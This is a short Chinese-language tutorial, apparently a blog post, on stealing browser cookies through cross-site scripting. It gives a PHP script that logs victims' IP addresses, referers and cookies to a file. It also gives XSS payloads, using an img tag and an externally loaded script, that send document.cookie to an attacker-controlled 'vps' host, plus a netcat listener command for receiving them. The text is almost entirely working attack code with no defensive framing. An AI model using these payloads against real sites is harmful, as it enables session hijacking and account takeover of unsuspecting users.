1. 通过网上的XSS平台接收cookie
  1. 通过PHP页面接收cookie
<?php
    $cookie=$_GET['cookie'];
    $ip=getenv('REMOTE_ADDR');
    $time=date('Y-m-d g:i:s');
    $referer=getenv('HTTP_REFERER');
    $rec=fopen('cookie.txt','a');
    fwrite($rec,"IP:".$ip."| time:".$time."| referer:".$referer."| cookie:".$cookie."\n");
    fclose($rec);
?>

方法一:直接利用script和img等标签构造发送cookie的payload。

如:

<script>document.write('<img src="http://vps/receive.php?cookie='+document.cookie+'" />')</script>

方法二:加载外部JS文件盗取cookie。

xss.js:

new Image().src="http://vps/receive.php?cookie="+document.cookie;

payload:

<script src="http://vps/xss.js"></script>

减少了输入字符的长度。

  1. 通过nc接收用户cookie

插入payload:

<script>document.write('<img src="http://vps/?'+document.cookie+'" />')</script>

然后在自己的vps中监听本地80端口(如果想从别的端口监听,需要在payload中vps地址后面加上指定的端口号)。

命令:nc -lvp 80

链接:

NC基础使用

获取cookie总结

本网站博主